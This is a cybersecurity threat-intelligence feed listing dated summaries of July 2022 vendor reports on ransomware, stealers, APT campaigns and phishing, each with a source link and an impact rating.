Summary:: The malware’s purpose is to steal credentials from the SSH and SCP processes by hooking the libc read function.

Source: https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/

Intel Source:: Volexity

Intel Name:: North_Korean_threat_actor_SharpTongue

Date of Scan:: 2022-07-29

Impact:: LOW

Summary:: Volexity discovered a new MAIL-THEFT malware "SHARPEXT" that believed has been used by a thret actor SharpTongue. This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky.

Source: https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/?s=09

Intel Source:: ReversingLabs

Intel Name:: The_new_discovered_Follina_exploit_used by_attackers_again

Date of Scan:: 2022-07-29

Impact:: MEDIUM

Summary:: ReversingLabs analyzed three malicious payloads circulating online that have been linked to use of the newly discovered Follina exploit in Microsoft’s Support Diagnostic Tool (MSDT).

Source: https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks

Intel Source:: Inquest

Intel Name:: An_Excel_Infection_Chain

Date of Scan:: 2022-07-29

Impact:: LOW

Summary:: Inquest researcher discovered that th threat actor make user tempt trying to enable content in Excel in order to run whatever surprise they have hidden inside.

Source: https://inquest.net/blog/2022/07/25/convoluted-infection-chain-using-excel

Intel Source:: Microsoft

Intel Name:: KnotWeed_targets_UK_Austria_with_SubZero_malware

Date of Scan:: 2022-07-28

Impact:: MEDIUM

Summary:: MSTIC identified a private threat actor who is Austria based and dubbed KnotWeed have been targeting law firms, banks, and strategic consultancies in Austria, the United Kingdom, and Panama with SubZero malware.

Source: https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/

Intel Source:: ASEC

Intel Name:: A_Korean_Web_Portal_Page_Daum_using_for_Spreading_Phishing_Emails

Date of Scan:: 2022-07-28

Impact:: LOW

Summary:: Researchers from ASEC have discovered the distribution of phishing emails impersonating a Korean Web Portal Page (Daum) and attackers using attachments to redirect the user to a phishing webpage.

Source: https://asec.ahnlab.com/en/37270/

Intel Source:: TrendMicro

Intel Name:: Gootkit_Loaders_Updated_TTPs_of_Cobalt Strike

Date of Scan:: 2022-07-28

Impact:: LOW

Summary:: Researchers from Trend Micro have identified the new tactics of Gootkit Loader. It is used for fileless techniques to drop Cobalt Strike and other malicious payloads.

Source: https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html?&web_view=true

Intel Source:: Cyble, SocInvestigations

Intel Name:: Threat_Actors_leveraging_Microsoft_Applications_via_DLL_SideLoading

Date of Scan:: 2022-07-28

Impact:: MEDIUM

Summary:: Researchers from Cyble and SOCInvestigation have identified the DLL (Dynamic-Link Library) sideloading technique leveraged by Threat Actors to spread payloads to users using legitimate applications which load malicious DLL files that spoof legitimate ones.

Source: https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ https://www.socinvestigation.com/threat-actors-leveraging-microsoft-applications-via-dll-sideloading-detection-response/

Intel Source:: ISC.SANS

Intel Name:: IcedID_malware_leveraging_Cobalt_Strike_and_Dark_VNC

Date of Scan:: 2022-07-27

Impact:: LOW

Summary:: The researcher from ISC SANS provides an analysis of IcedID malware which is using Dark VNC activity and Cobalt Strike.

Source: https://isc.sans.edu/diary/rss/28884

Intel Source:: CERT-UA

Intel Name:: UAC_0041_Group_distributing_Formbook_and_Snake_Keylogger

Date of Scan:: 2022-07-27

Impact:: LOW

Summary:: CERT-UA has analysed a phishing email which contains an attachment of malicious document related to Final payment. The document contains an EXE file classified as the RelicRace .NET downloader, the activation of which running of payload.

Source: https://cert.gov.ua/article/955924

Intel Source:: Esentire

Intel Name:: Gootloader_expands_its_payload_to_deliver_IcedID_malware

Date of Scan:: 2022-07-27

Impact:: LOW

Summary:: eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file.

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid

Intel Source:: Yoroi ZLab

Intel Name:: Diving_Deep_into_Hive_Ransomware

Date of Scan:: 2022-07-27

Impact:: MEDIUM

Summary:: Researchers from Yoroi ZLab deep dives into Hive Ransomware and identified it as a most sophisticated active threat. Also, they are tracking this infamous threat actor and observing any modification in its technique to provide a guideline.

Source: https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/?&web_view=true

Intel Source:: Trend Micro

Intel Name:: Similarities_between_LockBit_3_0_and_BlackMatter_ransomware

Date of Scan:: 2022-07-27

Impact:: MEDIUM

Summary:: Researchers from TrendMicro found similarities between New version of LockBit and Blackmatter ransomware. LockBit's extensive similarities to BlackMatter come from overlaps in the privilege escalation and harvesting routines used to identify APIs.

Source: https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html

Intel Source:: ISC.SANS

Intel Name:: Analysis_of_SSH_Honeypot_Data_with_PowerBI

Date of Scan:: 2022-07-27

Impact:: LOW

Summary:: The reseracher from ISC Sans providing some analysis of SSH Honeypot Data experimenting for a while with Microsoft PowerBI (1) using honeypot data, parsing it into comma delimited (CSV).

Source: https://isc.sans.edu/diary.html?date=2022-07-23

Intel Source:: Microsoft

Intel Name:: IIS_extensions_persistently_used_as_Exchange_backdoors

Date of Scan:: 2022-07-27

Impact:: LOW

Summary:: Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers as they have lower detection rates compared to web shells.

Source: https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

Intel Source:: CERT-UA

Intel Name:: UAC_0100_Group_leveraging_phishing_sites to_target_Ukrainian_Banks

Date of Scan:: 2022-07-27

Impact:: LOW

Summary:: CERT-UA has discovered an online fraud using phishing sites with the subject line of "aid from the Red Cross" which is targeting popular Ukrainian banks.

Source: https://cert.gov.ua/article/987552

Intel Source:: CERT-UA

Intel Name:: UAC_0010_Group_leveraging_GammaLoad_PS1_v2_malware_to_target_Ukraine

Date of Scan:: 2022-07-27

Impact:: LOW

Summary:: CERT-UA has analysed a phishing email which contains an attachment of malicious document related to National Academy of Security of Ukraine. The document contains an HTM dropper, the activation of which will lead to the creation of RAR archive file and further LNK file, running of LNK file lead to the download and execution of the HTA file.

Source: https://cert.gov.ua/article/971405

Intel Source:: Cyble

Intel Name:: The_Source_Code_of_Luca_Stealer_Malware_Leaked

Date of Scan:: 2022-07-26

Impact:: LOW

Summary:: The Cyble Threat Hunting team recently discovered an unknown Rust-based stealer, which is known as Luca Stealer, and the source code of this stealer was leaked on a popular cybercrime forum for free on July 3, 2022.

Source: https://blog.cyble.com/2022/07/25/luca-stealer-source-code-leaked-on-a-cybercrime-forum/

Intel Source:: Cyble

Intel Name:: The_Source_Code_of_Luca_Stealer_Malware_Leaked

Date of Scan:: 2022-07-26

Impact:: LOW

Summary:: The Cyble Threat Hunting team recently discovered an unknown Rust-based stealer, which is known as Luca Stealer, and the source code of this stealer was leaked on a popular cybercrime forum for free on July 3, 2022.

Source: https://blog.cyble.com/2022/07/25/luca-stealer-source-code-leaked-on-a-cybercrime-forum/

Intel Source:: Sophos

Intel Name:: Attacks_against_a_pair_of_vulnerabilities_in_Microsoft_SQL

Date of Scan:: 2022-07-26

Impact:: LOW

Summary:: Sophos Managed Threat Response (MTR) and Sophos Rapid Response had been investigating the attacks against Microsoft SQL Server installations. Sophos observed that threat group targeting externally exposed and unpatched SQL servers and during their initial investigations into this threat group, they saw them leveraging malware infrastructure impersonating a download site for KMSAuto, a non-malicious software utility used for evading Windows license key activations.

Source: https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/

Intel Source:: PWC

Intel Name:: New_tool_by_Charming_Kitten_and_its_OPSEC_errors

Date of Scan:: 2022-07-26

Impact:: MEDIUM

Summary:: PWC researchers analyzed activity of Yellow Garuda threat actor aka Charming Kitten and found that they have come up with new tools and also their operational security errors.

Source: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/old-cat-new-tricks.html

Intel Source:: Securelist

Intel Name:: A_New_CosmicStrand_UEFI_Firmware_Rootkit

Date of Scan:: 2022-07-26

Impact:: LOW

Summary:: A sophisticated UEFI firmware rootkit has been developed by an unknown Chinese-speaking threat actor, according to security firm Kaspersky. The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and Kaspersky noticed that all these images are related to designs using the H81 chipset.

Source: https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/

Intel Source:: NoLogs NoBreach

Intel Name:: Dot_PLAY_Ransomware

Date of Scan:: 2022-07-25

Impact:: MEDIUM

Summary:: A Threat Researcher has identified new ransomware variant during an IR engagement, which is called as .PLAY ransomware. Researcher confirms the initial access was exploitation of Fortigate Firewall vulnerabilities over Fortigate SSL-VPN, after initial access threat actors achieved privilege escalation and ransomware deployment in less than 24 hours. Moreover, No C2 traffic or tooling was detected. All actions were carried out over the VPN and through RDP.

Source: https://nologs-nobreach.com/2022/07/24/play-ransomware/

Intel Source:: AdvIntel

Intel Name:: Costa_Rican_Government_hacked_by_Conti_Ransomware

Date of Scan:: 2022-07-25

Impact:: LOW

Summary:: ADVIntel researchers uncovered how Conti ransomware hacked and encrypted the Costa Rican government. The Russian hacker steps from an initial foothold to exfiltrating 672GB of data on April 15.

Source: https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion

Intel Source:: Securonix

Intel Name:: North_Korean_linked_APT37_group_attack_with_Konni_RAT_malware

Date of Scan:: 2022-07-25

Impact:: MEDIUM

Summary:: Securonix Threat Labs is investigating a new attack campaign exploiting high-value targets, including North Korea, which could be linked to a North Korean cyber-espionage group (APT37).

Source: https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/

Intel Source:: ASEC

Intel Name:: Attackers_targeting_unpatched_Atlassian_Confluence_Servers

Date of Scan:: 2022-07-25

Impact:: MEDIUM

Summary:: Researchers from ASEC have analyzed that attackers are targeting vulnerable servers which are not patched. They are using RCE vulnerabilities and if successful, an attacker can install WebShell or malware to gain control of the infected system.

Source: https://asec.ahnlab.com/en/36820/

Intel Source:: Avast

Intel Name:: Candiru_Spyware_exploiting_Chrome_Zero_days_in_Middle_East

Date of Scan:: 2022-07-25

Impact:: LOW

Summary:: Avast researchers discovered a zero-day vulnerability in Google Chrome but now its fixed. The vulnerability was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.

Source: https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/

Intel Source:: Cyble

Intel Name:: Qakbot_continue_with_New_Techniques

Date of Scan:: 2022-07-25

Impact:: LOW

Summary:: Researchers from Cyble Lab came across Twitter post in which a user shared new IOCs related to the well known Qakbot malware.

Source: https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_started_using_Windows_installer_package_file

Date of Scan:: 2022-07-25

Impact:: LOW

Summary:: Researchers from ASEC have identified Magniber Ransomware that started using a Windows installer package file (.msi) instead of IE browser vulnerability for its distribution.

Source: https://asec.ahnlab.com/en/37012/

Intel Source:: ASEC

Intel Name:: IcedID_malware_sperading_through_ISO_files

Date of Scan:: 2022-07-25

Impact:: LOW

Summary:: Researchers from ASEC have identified that IcedID banking malware distributing with the help of ISO Files. They discovered two methods, the First is by the help of Bubblebee malware and the second is with script files and cmd command.

Source: https://asec.ahnlab.com/en/37005/

Intel Source:: MalwareBytes

Intel Name:: A_malvertising_chain_abusing_Google_s_ad_network

Date of Scan:: 2022-07-24

Impact:: LOW

Summary:: Malwarebytes researchers uncovered a malvertising chain abusing Google’s ad network to redirect visitors to an infrastructure of tech support scams. Unsuspecting users searching for popular keywords will click an advert and their browser will get hijacked with fake warnings urging them to call rogue Microsoft agents for support.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/07/google-ads-lead-to-major-malvertising-campaign/

Intel Source:: Cisco Talos

Intel Name:: GoMet_2_0_backdoor_attacks_Ukraine

Date of Scan:: 2022-07-24

Impact:: MEDIUM

Summary:: Cisco Talos has discovered a modified piece of malware targeting Ukraine and confirmed that the malware is a slightly modified version of the open-source backdoor named “GoMet2".

Source: https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_changing_its_Injection_Method

Date of Scan:: 2022-07-22

Impact:: LOW

Summary:: ASEC researchers constantly monitoring Magniber ransomware and found recently it is changing injection methods and started distributing as a Windows installer package file (.msi) on Edge and Chrome browsers.

Source: https://asec.ahnlab.com/en/36475/

Intel Source:: Sentinelone

Intel Name:: LockBit_3_0_updated_with_new_techniques

Date of Scan:: 2022-07-22

Impact:: MEDIUM

Summary:: Researchers at SentinelLab have detected the new techniques and features of LockBit 3.0. They are updating their encryption routines and adding several new features.

Source: https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/

Intel Source:: ProofPoint

Intel Name:: TA4563_leverages_EvilNum_malware_to_target_European_financial_entities

Date of Scan:: 2022-07-22

Impact:: MEDIUM

Summary:: ProofPoint researchers tracked threat actor which they named TA4563 have been leveraging EvilNum malware to target European financial and investment entities.

Source: https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities

Intel Source:: Mandiant

Intel Name:: CNMF_Discloses_Malware_in_Ukraine

Date of Scan:: 2022-07-22

Impact:: MEDIUM

Summary:: Mandiant shared in their blog a new malicious activity targeting Ukrainian entities during the ongoing conflict.They higlighted the operations of suspected UNC1151 and suspected UNC2589 by sending phishing with malicious documents leading to malware infection chains.

Source: https://www.mandiant.com/resources/spear-phish-ukrainian-entities

Intel Source:: Intezer

Intel Name:: Lighting_Framework_A_new_Linux_centric_malware

Date of Scan:: 2022-07-22

Impact:: MEDIUM

Summary:: Researchers at Intezers have detected a new undetected Swiss Army Knife-like Linux malware called Lightning Framework.

Source: https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/

Intel Source:: Cyfirma

Intel Name:: Analysis_of_NukeSped_Malware

Date of Scan:: 2022-07-21

Impact:: LOW

Summary:: Researchers at Cyfirma analyzed NukeSped Malware. The malware is associated with North Korean #APT Group Lazarus which is known to target US, South Korea, Japan and Asia Pacific countries.

Source: https://www.cyfirma.com/outofband/nukesped-rat-report/

Intel Source:: Google blog

Intel Name:: Continued_cyber_activity_in_Eastern_Europe

Date of Scan:: 2022-07-21

Impact:: MEDIUM

Summary:: Google’s Threat Analysis Group (TAG) continues to closely monitor Russian APT activity outside of Ukraine. TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm, Turla, COLDRIVER, Ghostwriter/UNC1151 groups and The Follina vulnerability.

Source: https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/

Intel Source:: Cyble

Intel Name:: Redeemer_Ransomware_released_new_version_Redeemer_2_0

Date of Scan:: 2022-07-21

Impact:: MEDIUM

Summary:: Researchers at Cyble has identified the latest version of Redeemer ransomware on darkweb cybercrime forums. The author of Redeemer ransomware released new version with updated features.

Source: https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/?utm_content=215383953&utm_medium=social&utm_source=twitter&hss_channel=tw-1141929006603866117

Intel Source:: Fortinet

Intel Name:: A_new_variant_of_QakBot

Date of Scan:: 2022-07-21

Impact:: LOW

Summary:: Fortinet’s researchers observered a phishing email as part of a phishing campaign spreading a new variant of QakBot.

Source: https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails?&web_view=true

Intel Source:: ISC SANS

Intel Name:: PyAutoGUI_lets_your_Python_scripts_control_the_mouse_and_keyboard

Date of Scan:: 2022-07-21

Impact:: LOW

Summary:: PyAutoGUI lets malicious Python scripts control the mouse and keyboard to automate interactions with other applications

Source: https://isc.sans.edu/diary/Malicious+Python+Script+Behaving+Like+a+Rubber+Ducky/28860

Intel Source:: ASEC

Intel Name:: SmokeLoader_malware_leveraging_Amadey_Bot

Date of Scan:: 2022-07-21

Impact:: LOW

Summary:: ASEC researchers discovered that Amadey Bot is being installed by SmokeLoader. Amadey Bot is capable of stealing information and installing additional malware by receiving commands from the attacker. Where SmokeLoader is used to install additional malware strains as a downloader.

Source: https://asec.ahnlab.com/en/36634/

Intel Source:: WeLivesecurity

Intel Name:: CloudMensis_spyware_targets_MacOS_systems

Date of Scan:: 2022-07-21

Impact:: LOW

Summary:: Researchers from ESET discovered a previously undetected macOS backdoor, tracked as CloudMensis, that targets macOS systems and exclusively uses public cloud storage services as C2.

Source: https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/ https://www.jamf.com/blog/cloudmensis-malware/

Intel Source:: Cert-UA

Intel Name:: Threat_actors_leveraging_AgentTesla_to_target_Ukraine_state_bodies

Date of Scan:: 2022-07-21

Impact:: LOW

Summary:: CERT-UA discovered the file "Report_050722_4.ppt", which contains a thumbnail image that mentions the operational command "South". In the case of opening the document and activating the macro, the latter will ensure the creation of the files "gksg023ig.lnk" and "sgegkseg23mjl.exe", as well as the execution of the LNK file using rundll32.exe, which in turn will lead to the launch of the mentioned EXE file.

Source: https://cert.gov.ua/article/861292

Intel Source:: Sentinelone

Intel Name:: 8220_Gang_Massively_Expands_Cloud_Botnet

Date of Scan:: 2022-07-20

Impact:: MEDIUM

Summary:: Over the last month a crimeware group best known as 8220 Gang has expanded their botnet to roughly 30,000 hosts globally through the use of Linux and common cloud application vulnerabilities and poorly secured configurations.

Source: https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/

Intel Source:: Lacework

Intel Name:: WatchDog_Adds_Steganography_in_Cryptojacking_Operations

Date of Scan:: 2022-07-20

Impact:: LOW

Summary:: Reserachers from Lacework reported about WatchDog’s cryptojacking campaign has adopted the unique steganography technique for malware propagation and other objectives. The XMRig miner was disguised as an image and hosted on compromised cloud storage (Alibaba Object Storage Service).

Source: https://www.lacework.com/blog/how-watchdog-smuggles-malware-into-your-network-as-uninteresting-photos/

Intel Source:: HP Wolf Security

Intel Name:: Open_Document_malware_targets_Latin_American_Hotels

Date of Scan:: 2022-07-20

Impact:: LOW

Summary:: Researchers from HP Wolf Security analyzed a stealthy malware campaign which uses OpenDocument text (.odt) files to distribute malware. The campaign targets the hotel industry in Latin America.

Source: https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/?web_view=true

Intel Source:: BitDefender

Intel Name:: Industrial_Espionage_Operation_explained

Date of Scan:: 2022-07-20

Impact:: MEDIUM

Summary:: Researchers from BitDefender analyzed an incident which was an industrial Espionage operation. In this attack the attacker managed to compromise a Patient Zero computer and used it to establish a secondary access avenue through a web shell planted on the company’s Exchange Server.

Source: https://www.bitdefender.com/blog/labs/under-siege-for-months-the-anatomy-of-an-industrial-espionage-operation/ https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf

Intel Source:: Palo Alto

Intel Name:: APT29_Group_leveraging_Online_Storage_Services

Date of Scan:: 2022-07-19

Impact:: MEDIUM

Summary:: PaloAlto researchers noticed that Russian SVR hackers using Google Drive and Dropbox to evade detection. APT29 has adopted this new tactic in recent campaigns targeting Western diplomatic missions and foreign embassies worldwide.

Source: https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/

Intel Source:: Citizen Lab

Intel Name:: Pegasus_Spyware_Used_Against_Thailand_s_Pro_Democracy_Movement

Date of Scan:: 2022-07-19

Impact:: LOW

Summary:: Citizen Lab discovered an extensive espionage campaign targeting Thai pro-democracy protesters, and activists calling for reforms to the monarchy

Source: https://citizenlab.ca/2022/07/geckospy-pegasus-spyware-used-against-thailands-pro-democracy-movement/

Intel Source:: Weixin

Intel Name:: Lazarus_Forged_Analysis_Report_on_Ecommerce_Component_Attack_Activities

Date of Scan:: 2022-07-19

Impact:: MEDIUM

Summary:: The APT-C-26 (Lazarus) organization has a clear purpose of this attack. It continue the attack activity disguised itself as an Alibaba-related component to attack. The payload component is related to the NukeSped family.

Source: https://mp.weixin.qq.com/s/USitU4jAg9y2XkQxbwcAPQ

Intel Source:: CISA

Intel Name:: A_continued_exploitation of Log4Shell in VMware Horizon Systems

Date of Scan:: 2022-07-19

Impact:: MEDIUM

Summary:: CISA has updated the Cybersecurity Advisory AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon, originally released June 23, 2022. The advisory now includes updated IOCs provided in Malware Analysis Report (MAR)-10382580-2.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-174a

Intel Source:: Resecurity

Intel Name:: Attackers_leveraging_tools_to_generate_LNK_Files_to_deliver_payload

Date of Scan:: 2022-07-19

Impact:: LOW

Summary:: Threat Hunters from Resecurity have detected popular tools used by cybercriminals. Attackers are actively leveraging tools allowing them to generate malicious shortcut files (.LNK files) for payload delivery.

Source: https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise?&web_view=true

Intel Source:: Palo Alto

Intel Name:: Elastix_VoIP_systems_hacked_in_massive_campaign

Date of Scan:: 2022-07-18

Impact:: LOW

Summary:: Recently, Palo Alto Unit 42 observed another operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium phone software (a FreePBX module written in PHP)

Source: https://unit42.paloaltonetworks.com/digium-phones-web-shell/

Intel Source:: Cyfirma

Intel Name:: Phishing_campaign_involving_Emotet

Date of Scan:: 2022-07-18

Impact:: LOW

Summary:: Cyfirma researchers noticed multiple phishing campaigns involving Emotet which is dropped through a n Excel 4.0 (.xls) file as attachment.

Source: https://media-exp2.licdn.com/dms/document/C561FAQFQ1G-qDcfWog/feedshare-document-pdf-analyzed/0/1658115611369?e=1658966400&v=beta&t=CrzicOViop8aDfMYLyTPjPGNhnX18D5OEvX1tTKP-sI

Intel Source:: Wordsfence

Intel Name:: Sudden_Increase_In_Attacks_On_Modern_WPBakery_Page_Builder_Addons_Vulnerability

Date of Scan:: 2022-07-16

Impact:: LOW

Summary:: The Wordfence Threat Intelligence team has been observed a spike in the attack attempts targeting Kaswara Modern WPBakery Page Builder Addons. This ongoing campaign is aiming to take advantage of an arbitrary file upload vulnerability, tracked as CVE-2021-24284, which has been previously disclosed and has not been patched on the now closed plugin.

Source: https://www.wordfence.com/blog/2022/07/attacks-on-modern-wpbakery-page-builder-addons-vulnerability/

Intel Source:: Qianxin Blog

Intel Name:: The_Maha_grass_group_attack_activity_against_Pakistan

Date of Scan:: 2022-07-16

Impact:: LOW

Summary:: Recenty the Red Raindrop team of Qi'anxin Threat Intelligence Center observed several attack samples of the organization in daily threat hunting. In this attack, the attacker uses a vulnerable RTF file to carry out a spear poking attack.

Source: https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait/

Intel Source:: Cloudsek

Intel Name:: The_Newly_Emerged_BlueSky_Ransomware

Date of Scan:: 2022-07-16

Impact:: MEDIUM

Summary:: CloudSEK discovered a financially motivated ransomware group, dubbed BlueSky, speculated to be connected to the Conti ransomware group.

Source: https://cloudsek.com/threatintelligence/tracking-the-operators-of-the-newly-emerged-bluesky-ransomware/

Intel Source:: Antiy Group

Intel Name:: Indian_APT_group_Confucius_targets_Pakistan_government_and_military_institutions

Date of Scan:: 2022-07-15

Impact:: LOW

Summary:: Antity group researcher published their findings on Indian APT Confucius campaigns targeting the Pakistani government and military institutions.

Source: https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ

Intel Source:: CERT-UA

Intel Name:: UAC_0100_group_leveraging_Online_Fraud_to_target_Ukraine

Date of Scan:: 2022-07-15

Impact:: LOW

Summary:: CERT-UA has discovered fraudulent pages on the Facebook containing links to "Unified Compensation Center for the Return of Unpaid Funds". The fraudulent pages suggesting users to provide personal information and make payments, which is harvesting payment card information.

Source: https://cert.gov.ua/article/761668

Intel Source:: Cyble

Intel Name:: ApolloRat_Malware_compiled_using_Nuitka

Date of Scan:: 2022-07-15

Impact:: LOW

Summary:: Cyble Researcher team has discovered a new RAT dubbed ApolloRAT.it is written in Python and uses Discord as its Command and Control (C&C) Server.

Source: https://blog.cyble.com/2022/07/14/apollorat-evasive-malware-compiled-using-nuitka/

Intel Source:: NCC Group

Intel Name:: Everest_Ransomware_new_TTPs_and_relation_to_Black_Byte

Date of Scan:: 2022-07-15

Impact:: MEDIUM

Summary:: Researchers at NCC Group analysed an Everest ransomware file, which they assess with medium confidence that Everest ransomware is related to Black-Byte. And documented new TTPs employed by the Everest Ransomware group.

Source: https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/

Intel Source:: Microsoft

Intel Name:: North_Korean_threat_actors_uses_H0lyGh0st_ransomware

Date of Scan:: 2022-07-15

Impact:: MEDIUM

Summary:: Microsoft threat intelligence center tracked a threat group DEV-0530 who is using H0lyGh0st ransomware to target small and midsize businesses.

Source: https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/

Intel Source:: Cisco Talos

Intel Name:: New_campaign_ongoing_by_Transparent_Tribe_APT_group

Date of Scan:: 2022-07-15

Impact:: LOW

Summary:: Researchers at Cisco Talos has discovered a malicious campaign targeting students of universities and colleges in India. it is also suggests that the APT is actively expanding its network of victims to include civilian users.

Source: https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html

Intel Source:: CISA

Intel Name:: NorthKorean_Threat_actors_uses_Maui_Ransomware

Date of Scan:: 2022-07-07

Impact:: MEDIUM

Summary:: A joint CSA has been released by FBI,CISA and DOT about Maui ransomware being used by North Korean threat actors to target Healthcare and Public Health Sector.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-187a

Intel Source:: Cyble

Intel Name:: NoMercy_Stealer_Rapidly_Evolving_Into_Clipper_Malware

Date of Scan:: 2022-07-07

Impact:: LOW

Summary:: Threat Hunters by exercising discovered, a new stealer named “NoMercy”. The investigation indicated that the stealer is a very crude and simple information stealer in its initial stages and TAs behind this are actively modifying the stealer and adding additional capabilities.

Source: https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/

Intel Source:: Security Affairs

Intel Name:: A_cryptomining_campaign_targets_Linux_servers

Date of Scan:: 2022-07-07

Impact:: LOW

Summary:: Microsoft Security Intelligence experts are warning of a long-running campaign conducted by a cloud threat actor group, tracked as 8220, that is now targeting Linux servers to install crypto miners.

Source: https://securityaffairs.co/wordpress/132777/cyber-crime/8220-cryptomining-campaign.html https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134

Intel Source:: Welivesecurity

Intel Name:: Phishing_tax_scam_at_Canada

Date of Scan:: 2022-07-07

Impact:: LOW

Summary:: Phishing scammers pose as Canadian tax agency before Canada Day

Source: https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/

Intel Source:: Palo Alto

Intel Name:: Threat_Actors_abusing_Red_teaming_tools

Date of Scan:: 2022-07-07

Impact:: MEDIUM

Summary:: Unit 42 PaloAlto recently hunted and discovered the new samples that match known advanced persistent threat (APT) patterns and tactics. These samples evaluated and raised an obvious detection concerns. The sample contained a malicious payload associated with Brute Ratel C4 (BRc4), the newest red-teaming and adversarial attack simulation tool to hit the market.

Source: https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

Intel Source:: Intezer

Intel Name:: Orbit_Malware_targeting_Linux_goes_undetected

Date of Scan:: 2022-07-07

Impact:: LOW

Summary:: Intezer researchers provided technical analysis of a new and fully undetected malware dubbed “Orbit” that is targeting Linux systems. This malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands.

Source: https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/

Intel Source:: ASEC

Intel Name:: Cobalt_Strike_and_Meterpreter

Date of Scan:: 2022-07-06

Impact:: LOW

Summary:: Reserachers from ASEC analyzed the attack case that installs Cobalt Strike and Meterpreter in vulnerable MS-SQL servers to gain control. The attacker then installs AnyDesk to control the infected system in a remote desktop environment.

Source: https://asec.ahnlab.com/en/36159/

Intel Source:: SecuInfra

Intel Name:: Bitter_APT_targets_Bangladesh

Date of Scan:: 2022-07-06

Impact:: LOW

Summary:: Researchers from Secuinfra analyzed a attack by Bitter APT group who has targeted military organizations of Bangladesh.

Source: https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/

Intel Source:: SocInvestigations

Intel Name:: DarkComet_RAT_returned_with_new_TTPs

Date of Scan:: 2022-07-06

Impact:: LOW

Summary:: Researchers from SocInvestigation documented about the new TTPs of DarkComet RAT and also its detection and response. Generally the Darkcomet is spread via Phishing campaign

Source: https://www.socinvestigation.com/darkcomet-rat-returns-with-new-ttps-detection-response/

Intel Source:: Securonix

Intel Name:: Diving_deep_into_BumbleBee_Loader_updated_IOCs

Date of Scan:: 2022-07-06

Impact:: MEDIUM

Summary:: Securonix Threat Labs Threat Research Team has analysed a sample of BumbleBee, it appear to follow a similar delivery mechanism which we can use to detect the initial foothold of the loader. Currently, AV detection of the BumbleBee loader is very weak as vendors work to update their signatures and heuristic detections. But the main DLL payload of this loader is very much capable of evading EDR detection at the time of publication.

Source: https://www.securonix.com/blog/securonix-threat-labs-initial-coverage-advisory-analysis-and-detection-of-bumblebee-loader-using-securonix/

Intel Source:: Microsoft

